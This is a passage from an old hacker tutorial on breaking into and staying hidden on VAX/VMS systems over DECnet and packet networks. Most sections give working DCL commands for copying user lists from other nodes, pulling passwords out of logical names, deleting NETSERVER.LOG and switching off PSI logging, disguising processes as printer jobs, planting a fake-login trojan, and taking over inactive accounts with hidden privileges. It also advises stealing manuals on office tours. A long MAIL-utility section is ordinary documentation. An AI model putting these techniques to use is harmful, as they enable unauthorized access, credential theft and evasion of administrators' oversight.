 Another interesting variation on this, is to get accounts on remote nodes that
are linked with your VAX.  To see other nodes that are accessible from your
VAX, type:

$show net

This will produce a listing like:



VAX/VMS Network Status for local node 2.161 NORTELCOM on 01-SEP-1989

The next hop to the nearest area router is node 2.62 BELCAN

Node                 Links     Cost    Hops   Next Hop to Node

2.161 NORTELCOM        0         0      0     Local   ->  2.161 NORTELCOM
2.6 JANUS              0         3      3     UNA-0   ->  2.6   JANUS
2.2 LUMPY              0         9      5     UNA-0   ->  2.2   LUMPY
2.3 SBSU               0         5      4     UNA-0   ->  2.3   SBSU
2.4 AURORA             0         4      4     UNA-0   ->  2.4   AURORA

 Total of 5 nodes.


This is a sample output that you would see on your screen.  Let me give a brief
explanation of what each column means.  The first column shows the node address
and the NodeName.  The node name is the most important to the VAX hacker since
that is how you will be contacting the remote node.  LINKS shows the number of
logical links between the local node and each available remote node. COST shows
the total line cost of the path to a remote node.  HOPS shows the number of
intermittent nodes plus the target node.  NEXT HOP TO NODE shows the outgoing
physical line used to reach the remote node.

The important item from this list of course is the node name. By referencing
this you can connect to other nodes.  A nice technique that allows you to get
user accounts on other nodes without actually having access to the node employs
this idea. For example, if you want to find out the user list of a node SBSU,
you could type:

$copy sbsu::sys$system:rightslist.dat sys$login

This will then transfer the rightslist from the other node to your login
directory, giving you a list of all the users on the other system that you can
hack out.

It should be noted that copying files from another node will create a file
on the remote node indicating your transfer.  To get rid of this, log onto the
remote node and delete the file called NETSERVER.LOG   (just delete the file
versions that you have created, and leave the others alone!)

There is another useful trick that sometimes yields more USER accounts on other
systems.  Try typing:

$show logical

This will present you with a giant list of what seem like symbol equates. What
you should look for in here is something that accesses a file in another system
eg.

"mainuaf"=sbsu::sys$system:sysuaf.dat

Many times, a user/password combination is hidden among these definitions. To
find these, simply search the file for occurrences where they have a nodename
such as SBSU followed by a quote and some info. An example:

"mainuaf"=sbsu"system manager"::sys$system:sysuaf.dat

The important part is the info in quotes after the node name. The first item
(before the space) is a username, and the word after the space is the password.
It is rare to find such an occurrence, but it should not be overlooked, since
it can sometimes yield high system level accounts.  In this example, node SBSU
has a user called SYSTEM, who's password is MANAGER.



DECNET and PSI
--------------

If you do a SHOW NET and it gives you a list of other nodes, you can connect to
these nodes using the SET HOST command. For example to connect to node SBSU:

$set host sbsu

This will then connect you to SBSU, and you have to go through their login
procedure also.  An interesting trick to note is, lets suppose that you have
hacked an account out on node SBSU.  What you want to find out is the DATAPAC
or TELENET address of the machine.  To do this use:

$mc ncp tell sbsu sh known dte

This will then give you the address of the machine, so that you can call it
directly rather than through this VAX.  You may want to do this to increase
speed, since obviously calling through another VAX slows things down a bit.

Another method which often works is to use the SHOW LOGICAL command.  By
specifying a certain table, you can sometimes get a list of the NUAs of the
other nodes in the same cluster as your node.  To do this type:

$show logical/table=*psi*

An alternative method which is a bit messy and requires higher privileges is to
type out the NETCIRC.DAT file. ie:

$type sys$system:netcirc.dat

On all the systems that I have seen, none of them had WORLD READ access to this
file, so it is not possible to read this with just TMPMBX and NETMBX privileges.

Many times you will want to call a phone number to another machine. To do this
use:

$set host/dte txa0: /dial=number:5551212

This command will dial out to 555-1212 using the terminal TXA0:  To dial out a
phone number, you MUST specify a terminal that is hooked up to a modem.  To
find out which terminals have modems type:

$show device

This will give you a list of devices hooked up to the VAX. Devices are 4
character strings followed by a colon (:) The terminals that you can use are
usually further down the list.  To test the terminal for a modem, use the
following line, which also illustrates the importance of lexicals:

$write sys$output f$getdvi("txa0","tt_modem")

This above line would test the terminal TXA0: to see if it has a modem attached
If it responds with TRUE, then you have a modem, otherwise not. Note that you
must put the terminal name in quotes, and also that you DO NOT enter the colon.

If the VAX you have hacked onto is hooked up on a packet switching system such
as DATAPAC or TELENET, then there is another USEFUL thing you can perform. To
call out NUA's use the /X29 qualifier. For example:

$set host/x29 026245400050570

This would call up the NUA 026245400050570 (altos:tchh).  What is interesting
to note is that on many VAX's you can call out to foreign remote nodes such as
in the example and the charge for the collect call is placed to the account
through which you are logged in as.  This is a safe and easy method to call out
to PSDN's which are normally long distance from you.  It should be noted that
many system managers turn off foreign DNICs, which may limit you to calling
only within your local DNIC.
 One precaution you may want to take when using the SET HOST/X29 command is to
turn off logging.  Although this is usually turned off, some system managers
may buffer everything you type in and keep it in a file. To temporarily turn
the logging off, try this:

$run sys$system:psipad

It will then ask for NODE:  just hit RETURN, then:

PSI>show log_file

this will either say that buffering is off or it will give you a filename with
a directory path. If it is not off then make a note of the file, then type:

PSI>set nolog_file

This will turn off the buffering. After you are through with the remote session
be sure to turn it back on with:

PSI> set log_file xxxx:[xxxx.xxxx]xxxxx.xxx

All the xxx's represent the full filename path that you initially wrote down
when you did the SHOW LOG_FILE command.

 I want to point out another interesting trick that sometimes works on certain
accounts. Many a time i have encountered an account on a Vax which would simply
allow you to call out to another node. It had no other purpose, and would
refuse to give you DCL access.  If you encounter such an account and it asks
you to enter a nodename, try putting /x29 NUA.  This technique allows you to
dial out to remote systems via some PSS even though you do not have DCL access!
An example:

Enter nodename> /x29 026245400050570

If /X29 isn't disabled, this will allow you to call that NUA.

One thing to note is that not all systems allow you to call out using these
methods. Some have /x29 disabled, others have /dial disabled etc.  In order to
overcome this barrier, it is important to know which files are involved.  If
you want to dial out, you MUST have the modem files (such as DMCL). If you want
to dial out across a PSS, you must have the PSI utility files, and lastly if
you wish to dial out to another node in the cluster you must have RTPAD.EXE on
the local node and REMACP.EXE and RTTDRIVER.EXE on the remote node.

One quick note about finding other VAXes that have PSI utilities on them. Often
you may want to hack only those VAXes that have PSIPAD on them.  To determine
if a particular VAX in your cluster has the capability, issue the command:

$dir NODE::sys$system:psi*.*

NODE stands for the nodename that you want to check.  If this returns with a
message that no files match, then this particular VAX does not have PSI
installed.  If on the other hand it returns with several file names, then it
does have the PSI utilities installed.

This is just a VERY brief overview of the DECnet setup on VAX/VMS systems.  For
a more detailed analysis, look for my other file: 'Understanding DECnet and
NCP'



HIDING ON THE SYSTEM
--------------------

There are several methods that allow you to remain undetected once you have
hacked onto a VAX.  One of the most important things is to leave things as they
are, in other words, do not delete files or subdirectories.  You should also
avoid leaving suspicious looking COM or EXE files that you may have created.

An important ability to have is being able to hide from SHOW USER. There are
several ways of going about this, but the simplest is to become a
non-interactive process. Or to become a subprocess of some other
non-interactive process such as a BATCH or NETWORK process.  Although this will
hide you from SHOW USERS, you will still be visible if someone did a SHOW
SYSTEM. To get around this you should also specify your process name to a
printer driver or something. For example:

$show system

Look for the process that has a name of "SYMBIONT_xxxx" where xxxx is a number.
These are the printer drivers on the system.  Look for the last number on the
list and then change your own process to one higher than this number.  For
example if the last printer is 5 then type:

$set proc/name="SYMBIONT_0006"

At the end of this file i have enclosed a small 20 line assembler program that
you can enter through EDIT.  It allows you to hide from SHOW USER by changing
your process to an OTHER non-interactive process. After you assemble the file,
link it and then execute it using the RUN command. You should then copy this
file to some rarely used directory, where no one else will notice it.

OTHER PROCESSES
---------------

  So you have hacked your way in, and everything is going smooth. Now you want
to find out what all the other people on the system are doing.  There are
several ways of finding out who else is using the system and what they are
doing. Here i will outline some of the basic methods.
  Perhaps the simplest command that you can issue to see who else is logged in
is the SHOW USER command.

$show user

a typical output might look like:



            VAX/VMS Interactive Users
              1-SEP-1989 12:48:51.14

       Total number of interactive users=5

   PID        Username    Process Name     Terminal

202000B3      DELUCAJ     DELUCAJ          VTA21:      TTA7:
204000C4      <login>     _vta13:          VTA13:      LTA8:
20400138      OPERATOR    system monitor   VTA17:      OPA0:
2040013D      POLLACK     POLLACK          VTA11:      TTB0:
204000BC      ENTITY      FUK YOO          VTA15:      TTA1:


Ok so what does all this mean?! Well lets go one column at a time. The first
column gives you your process identification number. This is a unique number
that is assigned to each process as it logs in.  The number itself really
doesn't matter, however it is required for certain commands.  The next column
is the username of the process. This always puts the name of the account that
you logged in with.  Sometimes you may notice that instead of a name it says
<login>   This indicates that someone is currently going through the login
procedures under that PID.  The next column is the process name. This is
defaulted to be the same as your username, but can easily be changed. For
example:

$set proc/name="Hacker!"

This will set your process name to Hacker!  Since everybody will see this when
they do a SHOW USER command, it is not recommended that you choose something
that will give you away. In general, you leave this as the default.  The next
column shows the virtual terminal that you are logged into.  The last column
shows the physical terminal that you are logged into. It is important to check
this last column.  You should check to make sure that nobody is logged in under
OPA0:  Anyone logged in under this is using the system console, which means
that they could possibly be watching you!  Another one to note is RTxx: which
indicates a process that is remotely logged in (ie calling in from another
VAX or something)  Other things that you should watch out for are users who are
logged in under the SYSTEM account or any other high-privileged accounts.  Any
one of OPERATOR,OPER,SYSTEM,SYSMGR etc could mean trouble for the hacker.

 One thing that you may notice on some systems is that a process will be logged
on ALL the time under the OPA0: terminal.  What's going on?! Is the system
manager there all the time?  No. What happens on many systems is that the
system manager logs into his terminal, and doesn't bother logging out at the
end of the day, leaving his process running often for weeks at a time.  There
is no easy way to know if the guy is really there or not.  There are two things
you can do. One is to check the time that the account has been IDLE, but there
is no easy way to check this without going into some programming.  The next
best you can do is issue the SHOW SYSTEM command.  This will show all the
processes currently running, their priority levels, how much CPU time they are
eating up etc. A typical report may look like:

$show system

VAX/VMS X2EN  on node DELPHI  01-SEP-1989 15:10:31.02   Uptime   0 12:06:30

  Pid      Process Name   State  Pri     I/O      CPU        Page flts  Ph. Mem

22200080   NULL           COM    0         0    0 16:34:12.00        0        0
22200088   SWAPPER        HIB    16        0    0 00:03:52.53        0        0
22200113   ENTITY         LEF    4     16505    0 00:00:12.02     8689      233

                               :
                               :
                               :
                               :

                            etc etc



This display can give you several important pieces of information about other
processes. The explanation of each column:

PID       - the process identification number
Proc Name - the name of the process. Note that certain non-interactive system
            processes such as NULL, SWAPPER, ERRFMT etc are always running in
            background.
STATE     - This is important.  This tells you what the process is currently
            doing.  HIB-hibernating, COM-computing, LEF-active, CUR- current
PRIORITY  - the higher the priority number, the higher priority it has in terms
            of accessing CPU time.
I/O       - Shows the accumulation of the direct I/O and buffered I/O
CPU       - the total amount of CPU time the process has used so far
PAGE FLTS - page faults, number of exceptions generated. Not very useful...
PH. MEM   - amount of physical memory that the process occupies

A further thing you may notice after the last column on some processes is a
single letter. This is the process indicator, and it can be one of:

B - batch job
S - subprocess
N - network process


Another useful option is the ability to know which files, each of the processes
are accessing. To accomplish this type:

$show devices/files/nosystem

The only problem with this command is that it will not show the filename if you
do not have read access to it. (or the BYPASS privilege)

Perhaps the most POWERFUL tool that the VAX/VMS hacker has is the System Dump
Analyzer (SDA).  An important option of this allows you to view all the process
running on the system, what files they are accessing, their process status,
the contents of their virtual memory (such as keyboard buffer) etc etc  A VERY
powerful command, it is started with the command:

$analyze/system

The only drawback with this command is that it requires the CMKRNL privilege.
I will discuss this feature in more detail later in the file.



DETACHED ACCOUNTS
-----------------

A very big security loophole which is allowed on many VMS systems are detached
accounts.  Basically what this allows you to do is cut carrier instead of
logging out properly.  Instead of logging the process out, it is left waiting
on the system.  The next user who logs in, instead of getting a Username prompt
will get your shell ($) prompt!  There are many useful things you can do with
a detached account.  The most obvious use of course is to set up a Trojan Horse
program. Basically you write a procedure that simulates the VAX/VMS login
sequence.  After the user enters his/her username-password, you save this info
to a file, give him a 'User authorization failure' and throw him into the real
login sequence.  He will think he mistyped something and this time when he
tries, he will be able to log in normally. But in the meantime, you have a copy
of his username/password combination stored away in a file, which you can later
use!



EXAMINING FILES
---------------

Often it becomes necessary to examine a file in greater detail than provided by
a simple TYPE command.  For executable and object files there is of course the
ANALYZE/IMAGE and ANALYZE/OBJECT commands, but often you want to have a look at
each individual byte in the file.  The best way to do this is to use the DUMP
command.  An example:


$dump test.dat


DUMP of file DISK0:[NORMAN]test.dat  on  15-APR-1989  15:43:26.08
File ID (3134,818,2)   End of file block 1 / Allocated 3

Virtual block number 1 (00000001), 512 (0200) bytes

706d6173 20612073 69207369 68540033 3.This is a samp 000000
73752065 62206f74 20656c69 6620656c le file to be us 000010
61786520 504d5544 2061206e 69206465 ed in a DUMP exa 000020
00000000 00000000 0000002e 656c706d mple............ 000030
00000000 00000000 00000000 00000000 ................ 000040

                     :
                     :
                     :

00000000 00000000 00000000 00000000 ................ 0001E0
00000000 00000000 00000000 00000000 ................ 0001F0


As you can see, this not only shows the ASCII interpretation, but also the HEX
value for each byte.  This can be VERY valuable in certain situations.  You
should note that since the default is HEXADECIMAL LONGWORD, the bytes seem to
be in a backwords order.  This is due to the way the machine stores numbers in
memory: Lo-byte,LSB,MSB,Hi-byte.  You can optionally specify the numbers to
come out in decimal or also in single byte format.  Example:

$dump sbsu::sys$system:rightslist.dat /byte/header/decimal

See the online HELP files for more detail into the various qualifiers. You
should note that you CAN use dump to access files on OTHER nodes!


CREATING TEXT FILES
-------------------

  This isn't the best of places to put this topic, but if I don't do it now, I
will probably forget later on, so here goes...
  Often you will need to create files on a system, such as messages to other
hackers, notes to yourself, small DCL programs etc. The basic method is as
follows:

$create file.txt

   Hi this is a dumb message that i am typing just to
   see how this command works.

   <CTRL-Z>

$

Basically what is happening here is you specify a filename and an extension
when using the CREATE command (in this case file.txt) and then the system waits
there for you to type in something.  At this point you can type whatever you
want, and to end the message/program/memo just hit CTRL-Z. This will return you
to the DCL prompt.  This is an easy method to transmit COM files that you have
either created or buffered from some other system.  Just issue the CREATE
command, send the file through your buffer, then hit CTRL-Z to finish it off.



VAX/VMS MAIL SYSTEM
-------------------

  Although it is not a good idea to use the MAIL system to send or receive
messages (since the messages can be read by anyone with enough privs) I will
present a brief list of what it can do.  One important thing to note is that
whenever there are MAIL messages waiting to be read, they are stored in a file
that ends with the MAI extension.  So if the account you have logged into has
received mail, and you really want to read it for some reason, then you can do
the following from DCL:

$type mail.mai

This file is not necessarily called MAIL.MAI, it could be any other name with
a MAI extension.  Aside from some header information stored at the beginning
of each message, the rest of the message is mostly in standard ASCII and easily
readable.  Doing it this way ensures that the message remains there for the
REAL user when he logs in. (after a message has been read, it is put into
another area, and the user will not see it.  This could make him suspicious if
he keeps losing important mail messages!)
  Reading MAIL files can be quite useful, because sometimes important messages
are stored here.  Like i stated earlier, you shouldn't be actually using MAIL
to read the mail since it will then get deleted, and the actual user will
eventually notice.  Also, you shouldn't use the MAIL system to send
hacker-related information (to other hackers) because system managers can
access your mail and read what you have to say.
  Basically you can use the MAIL facility in two ways: Interactively and
through the shell.  For ease of use I will only describe the interactive method
since it is easier and more flexible.  If you insist on doing it from the
shell, then just call up the ONLINE HELP for the qualifiers.  In any case, to
interactively use the MAIL utility type:

$mail

This will respond with the prompt:

MAIL>

At this point you can enter the various mail commands.  Following is a brief
overview of the more important commands and concepts.  At the end, I have
provided a table with all the possible commands that can be entered here.



Heres a brief list of the more important MAIL commands that I will discuss here


         SEND        DIRECTORY     EXTRACT
         READ[/NEW]  DELETE        PRINT
         FORWARD     MOVE          HELP
         REPLY       SELECT        EXIT

The first command to try is the SEND command.  Try sending a message to
yourself Enter the SEND command and press RETURN.  Enter your own user name at
the prompt and press RETURN.  Enter a subject at the prompt and press RETURN
again. The following example shows how to use the SEND command:

MAIL> SEND
To:PIERCE
Subj:Sailing
Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:

When you finish entering the text of your message, press CTRL-Z. Because you
are sending the message to yourself, MAIL signals that you have just received a
new message by displaying the following message:

New mail on node FLAXEN from PIERCE

MAIL>

Now, you are ready to use the READ command.  To read the message you just sent
to yourself, enter the READ command with the /NEW qualifier and press RETURN as
follows:

MAIL> READ/NEW

You must specify the /NEW qualifier with the READ command when you want to read
new mail that arrives while you are in the Mail Utility.  When you are not in
the Mail Utility and you receive new mail, invoke MAIL to read the new message,
you can enter the READ command without the /NEW qualifier.  Or, if you wish to
read mail that you have already read, you can enter the READ command.

You can forward a copy of a mail message to another user by entering the
FORWARD command.  MAIL prompts you for the name of the user to receive the
message. Try forwarding a copy of the message you just received back to
yourself. Enter your own user name and press RETURN.  Supply a subject when
prompted and press RETURN MAIL signals that you have just received a new
message. Enter the READ/NEW command to read the forwarded message.

When you receive a message and want to respond to it, enter the REPLY command
and press RETURN.  MAIL displays the header information as follows:

MAIL> REPLY
To:FLAXEN::PIERCE
Subj:RE: Using the REPLY command
Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:

When you finish typing your response, press CTRL-Z.  Again, MAIL signals that
you have just received a new message.  To read the message, enter the READ/NEW
command.

When you want to see a list of all the mail messages you have collected, enter
the DIRECTORY command and press RETURN.  MAIL displays a list like the
following:

         # From             Date                  Subject

         1 FORBES           1-SEP-1989            How to Write a Memo
         2 SBSU::BERT       2-SEP-1989            Using the Printer
         3 FROST::BASTIEN   4-SEP-1989            Chicken Kiev


When you want to remove a message, use the DELETE command.  You can either
enter the DELETE command while you are reading the message or you can enter the
DELETE command followed by the number of the message you want to remove.  To
remove the second message in the list, enter the following command line:

MAIL> DELETE 2

If you enter the DIRECTORY command after you have deleted a message (or
messages), you see the messages marked for deletion, as follows:

         # From             Date                  Subject

         1 FORBES           1-SEP-1989            How to Write a Memo
         2 (Deleted)
         3 FROST::BASTIEN   4-SEP-1989            Chicken Kiev


When you exit from MAIL, the messages marked for deletion disappear.

The Mail Utility allows you to organize your messages by moving them into
folders.  To move a message to a folder, enter the MOVE command (while you are
reading the message) and press RETURN.  MAIL prompts you for a folder name.
Type any name, for example, REVIEWS or JOKES or STATUS_REPORTS.  MAIL also
prompts you for a file name.  You can specify the default mail file by pressing
RETURN.  A sample session demonstrating the MOVE command follows:

MAIL> 2
MAIL> MOVE
_Folder: HACKERS
_File: <RET>

Folder HACKERS does not exist.
Do you want to create it (Y/N, default is N)? Y
%MAIL-I-NEWFOLDER, folder HACKERS created

In this example, the folder name is HACKERS and the default mail file is
specified.  If the folder you name does not exist, MAIL asks you if you want to
create it.

Once you have created folders, you may want to move between them. To move from
one folder to another, use the SELECT command.  If you want to move to the
HACKERS folder, enter the SELECT command as follows:

MAIL> SELECT HACKERS

%MAIL-I-SELECTED, 1 message selected

In this example, MAIL displays a message indicating the number of messages in
the folder.

To move to a folder named JOKES, enter the following command line:

MAIL> SELECT JOKES

%MAIL-I-SELECTED, 32 messages selected


You can enter the DIRECTORY command to see a list of the messages in the folder
you just selected.

When you want to move a mail message from your mail file to a sequential file
that you can access from the DCL command level, use the EXTRACT command.
Enter the EXTRACT command (while you are reading the message) and press RETURN.
MAIL prompts you for the name of a file.  Then, when you exit from MAIL, the
file is listed in your directory.  The following example shows how to use the
EXTRACT command to move a mail message to a file named GAMES.DAT.

MAIL> EXTRACT
_File: GAMES.DAT

%MAIL-I-CREATED, DISK:[BERGMAN]GAMES.DAT;1 created

MAIL>

To print a hard copy of a mail message, enter the PRINT command while you are
reading the message and press RETURN.  (When you exit from MAIL, the message
enters the print queue.) The following example shows how to make a hard copy of
message #4 by using the PRINT command:

MAIL> 4

    #4          4-AUG-1989 09:39:20           MAIL
From:  SPARTA::FELLINI
To:    MARSTON
Subj:  Rydell's Reasons

In reference to the meeting of July 26, I would like to explain
Rydell's opinion more fully...

MAIL> PRINT

When you are ready to leave MAIL, enter the EXIT command and press RETURN.
Any messages marked for deletion disappear.  Any messages marked for printing
enter the print queue and the following message is displayed:

MAIL> EXIT
Job MAIL (queue ATLAS_PRINT, entry 43) started on QUEUE$LPA0


The next section is a detailed look at what is possibly the  most important of
the MAIL commands -- SEND

Format:   SEND  [filespec]

Sends a message to another user(s).  Use the SEND command and the MAIL command
interchangeably because they work the same way. MAIL prompts you first for the
name of the user(s) to receive the message.  You reply with the user name(s)
or with the file name of a distribution list file(s), in the following format:

[[nodename::]username,...] [,] [@listname[,...]]

If you have entered the SET CC_PROMPT command or used the /CC_PROMPT qualifier,
you can then specify names of users to receive carbon copies of the message at
the CC: prompt.

Next, MAIL prompts you for the subject of the mail.  To avoid the "Subj:"
prompt specify the /SUBJECT qualifier with the SEND command.

You can include a file specification with the SEND command.  If you specify a
file with the SEND command, the text in that file is sent to the specified
user(s).  If you do not specify a file, MAIL prompts you for the text of your
message.

Enter the message that you want to send; then press <CTRL-Z>.  Note that once
you have typed a line and pressed RETURN, there is no way to edit it. If you
decide not to send a message you are typing but want to stay within the Mail
Utility, press <CTRL-C> to abort the message.  You then receive the MAIL>
prompt.  CTRL-Z exits you from MAIL.


Examples
--------

1.
   MAIL> SEND/LAST
   To:FLIGHT::MYERS
   Subj:Geometric Concepts
   MAIL>


This example shows how to send a copy of the last mail message you sent to a
user named Myers on node FLIGHT.

2.
   MAIL> SEND/SELF/SUBJECT="Good Harbor"
   To:DAPPER::WAYNE
   Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:


This example shows how to send a mail message to a user named WAYNE on node
DAPPER.  The /SELF qualifier enables MAIL to send a copy of the same message
back to you.  The subject of the  message  is  Good Harbor. Since the /SUBJECT
qualifier was specified, there is no Subject: heading.

3.
   MAIL> SEND
   To:BAKER,MARSTON,@SUPERVISORS
   Subject:Handling Stress
   Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:


This example shows how to send a mail message to two users (BAKER and MARSTON)
and a distribution list (SUPERVISORS).

One of the important concepts relating to MAIL is the idea of FOLDERS.  All
mail files are subdivided into folders.  By default, your mail file (MAIL.MAI)
contains a folder called MAIL.  The MAIL folder contains messages that you have
already read.  When you receive new mail messages, they automatically enter
into a folder named NEWMAIL.  After you read the messages in the NEWMAIL
folder, they automatically move into the MAIL folder and the NEWMAIL folder
disappears.  When you delete a message it automatically moves into the
WASTEBASKET folder.  Deleted messages collect in the WASTEBASKET folder until
you empty it.  To emtpy the WASTEBASKET, enter either: EXIT or PURGE You can
create as many folders as you want.  You always know which folder you are
currently in because the name of the folder is displayed at the top right
corner of the screen when you enter the READ or DIRECTORY command.  You can
enter the DIRECTORY/FOLDER command to see a display of the existing folders in
the current mail file.  (use the MOVE command for creating new folders) You can
remove a folder by deleting all the messages that it contains.

A look at a sample MAIL heirarchy:


       [mailfile1]        [mailfile2]                 [mailfile3]
            !                  !                           !
            !            +-----+---------+            +----+---------+
        [folder1]    [folder1]        [folder2]       !              !
            !            !               !        [wastebasket]  [folder1]
            !          +-+-----+       message1       !              !
         message       !       !                   garbage1       message1
                   message1  message2


                          MAILFILE ---> FOLDERS ---> MESSAGES



MAIL COMMANDS OVERVIEW
----------------------

Here I have provided a listing of all the commands that you can issue from the
mail utility and a brief description of what each one does:


Command            Description
-----------+-------------------------------------------------------------------
ANSWER     ! Same as the REPLY command.  See below
ATTACH     ! Allows you to switch to another process in your job
BACK       ! Displays the last message read
COMPRESS   ! Makes an indexed sequential mail file smaller
COPY       ! Copy a message to another folder, without deleting original
CURRENT    ! Displays the beginning of the message you are currently reading
DEFINE     ! Allows you to define keys as macros
DELETE     ! Delete a message
DIRECTORY  ! Displays a list of the messages in the current folder
EDIT       ! Enables you to edit a message before it is sent
ERASE      ! Clears the screen
EXIT       ! Exits from the MAIL utility
EXTRACT    ! Places a copy of the current message into a sequential file
FILE       ! Moves the current message to the specified folder
FIRST      ! Displays the first message in the current folder
FORWARD    ! Sends a copy of the message you just read to another user
KEYPAD     ! Define the keypad
LAST       ! Displays the last message in the current folder
MAIL       ! Sends messages to another user.  Identical to the SEND command
MOVE       ! Moves the current message to the specified folder
NEXT       ! Skips to the next message and displays it
PRINT      ! Dumps messages to the PRINTER
PURGE      ! Deletes all messages in the WASTEBASKET folder
QUIT       ! Quits MAIL without deleting messages in WASTEBASKET
READ       ! Displays your messages
REPLY      ! Sends a message to the sender of the message you are reading
SEARCH     ! Searches the current folder for the message containing a string
SELECT     ! Allows you to switch to another folder
SEND       ! Send a message to another user
SET-SHOW   ! Review or Modify various characteristics of the MAIL utility
SPAWN      ! Create a sub-process.  Often useful to the hacker...
-----------+-------------------------------------------------------------------


COMPILING PROGRAMS
------------------

Once you are comfortable with the VAX/VMS operating system, you will probably
want to write yourself some useful little hacker utility programs.  Although
many can be simply written as DCL script files, often the occasion arises where
the use of a high-level language is necessitated.  Through a high-level
language you have full access to the system services, as well as a lot more
control of what you want the VAX to do.  Here I will very briefly show how to
write, compile and execute a basic program.  Creating executable files in other
languages follows the same overall procedures: To activate basic from the shell
type:

$basic

This should put you into the VAX-BASIC environment, and the terminal will print
READY on your screen.  If just typing BASIC doesn't work, you may want to try:

$mc basic

This sometimes works, but it should be noted that BASIC is not found on all
VAX's.  Some have it, some don't.  In any case, whenever you are editing a
program, you should never leave source code lying around.  The best way is to
edit the file on an online buffer editor, and then transmit the file.  It
should always be done in this manner unless your file is VERY large, and it
would be cumbersome to keep uploading it.  If you must, then to save your
creation onto the VAX, just type:

save "filename"

This will save the source code with a .BAS extension.  You should rename this &
hide it in some seldom checked directory.  After you have finalized your coding
you should create an executable file, download your source code, and then
delete the one online.  To create an executable file, first you must exit back
to DCL, do this by typing EXIT.  Then once in DCL type:

$compile filename.bas
$link filename
$delete filename.obj;*

Note that you can link multiple OBJ files together, just like in MS-DOS.  It
should also be noted that to create truly useful programs you will need to get
your hands on a system services manual.  Through the system services you can
gain all kinds of information about the system and any nodes that it is hooked
up to.

NOTE: type HELP in BASIC to get a complete list of all the commands and syntax


ATTAINING MANUALS
-----------------

    As you can see, if you are going to get anywhere, you will have to get your
hands on some manuals.  Perhaps the best book you should invest in is "VAX/VMS
INTERNALS AND DATA STRUCTURES".  This book concentrates on explaining all the
data structures as well as all the system service calls and how everything
basically works inside a VAX.  Once you have read and understood this book,
VAX/VMS kernal programming should become a snap.  Its available at most big
bookstores but it costs about $130 (Canadian funds).  You may also want to look
at your local library or University library, since they usually carry this book
and other ones you may want to grab. Aside from these places the next best
place to get major information is from the actual VAX/VMS manuals.

Unfortunately these cannot be bought at any store.  However there are several
ways you can get your hands on one.  One method is to go work at a company
during the summer that uses VAX'es.  Then just grab the manuals or better yet,
photocopy them.  (be forewarned though.  Theres several thousand pages worth of
useful info!) Or if you know someone else who works at such an establishment,
you can get them to heist the manuals for you.  Other good techniques are
taking guided tours of offices of large corporations.  This is the BEST method,
because you can usually pick up a lot of stuff.  Just make sure you go with a
friend (to distract the guide, lookout etc) and carry a school bag with you.
When they get to the computer room, start looking around.  Usually they will
have the manuals in some big shelf somewhere.  Just grab yourself whatever you
need.  Also keep a lookout for other useful info laying around such as system
accounts, dialups etc If you really need to find the number of a VAX and you
don't see it posted anywhere, then you should get yourself a cheap little
phone.  (you know those K-MART $4.99 jobs) Take the phone plug out of the jack,
plug in your phone and dial up your local ANI.  This will give you the phone
number to the dialup.  It should be noted that not all VAX's allow remote
logins.  This can be adjusted from the SYSUAF setup via the AUTHORIZE program.

Local ANI's for TORONTO are:

997-8123
997-1234
997-1699

If you don't have any Local ANI's, then just ask around on your local
PHREAK/HACK boards.



CREATING/MODIFYING ACCOUNTS
---------------------------

The job of creating, modifying and deleting users is performed via the image
AUTHORIZE.  This program is always found in the sys$system directory, and
requires at least the SYSPRV privilege.  If you do not have this (or SETPRV)
then you cannot execute this file.  Assuming you have hacked out an account
with the required privilege or you have via some mechanism boosted your privs,
then this is how to start up AUTHORIZE:

$sd sys$system
$run authorize


This will return you with the UAF prompt:

UAF>

At this point you can make modifications to the User Authorization File (UAF).
It should be noted that the two files that this program accesses are SYSUAF.DAT
and RIGHTSLIST.DAT, and both of these are found in the SYS$SYSTEM directory.
First, heres the quick and dirty way to create a new user:

UAF> add username /password=whatever/priv=setprv

This is basically the minimum requirements for creating a high-privileged user
on a system.  Of course, you should try and avoid adding new users in where
possible.  It is a much better idea to try and find an INACTIVE user who hasn't
logged in for quite a while and change their password to whatever you want.
This way, any system operator will not get suspicious because of a new
username.  In addition, when granting privileges to either your own user, or
modifying some other user, you should NEVER give them ALL privs.  The reason is
simple: IT STANDS OUT!  Anybody going through the sysuaf database can
immediately pick out such accounts, and you will be found out very quickly.  If
you must give all privs then the better way is to simply grant the SETPRV
privilege as the normal privilege.  (do not assign it as a default however) The
reason for this is that this will not stand out as much.  By not assigning it
as a default, if the real user happens to log in for any reason, they will not
see it as one of their privs when performing a SHOW PROC/PRIV.  The only way to
activate your hidden privileges is by issuing:

$set proc/priv=all


Here I will briefly outline the commands you can perform from UAF:

Command  Description
-------------------------------------------------------------------------------
ADD    !This as you know will add a new user. You may specify many qualifiers
       !when creating the account.  See the online HELP for further information.
COPY   !Allows you to copy any record in the UAF to a new user.
CREATE !Allows you to create either the RIGHTSLIST.DAT or NETUAF.DAT files if
       !they don't already exist.
DEFAULT!Allows you to change any item in the DEFAULT record in SYSUAF.DAT
EXIT   !Terminate authorize and go back to the VMS shell.
GRANT  !Grants an identifier name to a user UIC
LIST !Makes a listing file (SYSUAF.LIS) which gives information on the records
!specified.  MODIFY !Allows you to modify an existing user.  see below for
further discussion REMOVE !This allows you to delete an existing user record
RENAME !This allows you to change the username of a record REVOKE !Revokes an
identifier name from a username or UIC identifier SHOW !Allows you to view the
records in SYSUAF.DAT, RIGHTSLIST.DAT and !NETUAF.DAT
-------------------------------------------------------------------------------

The commands you will be using most from here are SHOW and MODIFY.  Show can be
used to isolate INACTIVE accounts (based on last login), failed login attempts
etc.  The MODIFY command will let you change any characteristic in any of the
records.  Below I will give a short discussion on some of the more important
qualifiers that can be specified.  Note that exactly the same thing applies to
the ADD command:

/ACCESS  -if the account is set up for no remote access or whatever, just
          include this qualifier (no parameters) to gain FULL access.
/DEFPRIV -your default privileges.  These are the privileges that are active
          upon login
/DIR     -the directory assigned to you upon login.  ie.  SYS$LOGIN
/DEVICE  -the drive that the directory is in.
/FLAGS   -this is an important one!  You can specify things such as CAPTIVE
          accounts, NODISUSER, and many others.
/LGICMD  -the file that is executed upon login.  Normal setting would be
          /LGICMD=login.com
/PASSWORD-primary password
/PRIORITY-CPU priority. Normal setting is 4
/PRIV    -your assigned privileges. Should NOT use ALL, very conspicuous.
/PWDMIN  -minimum password length
/UIC     -User Identification Code


On most systems you will find a file called ADDUSER.COM which allows the system
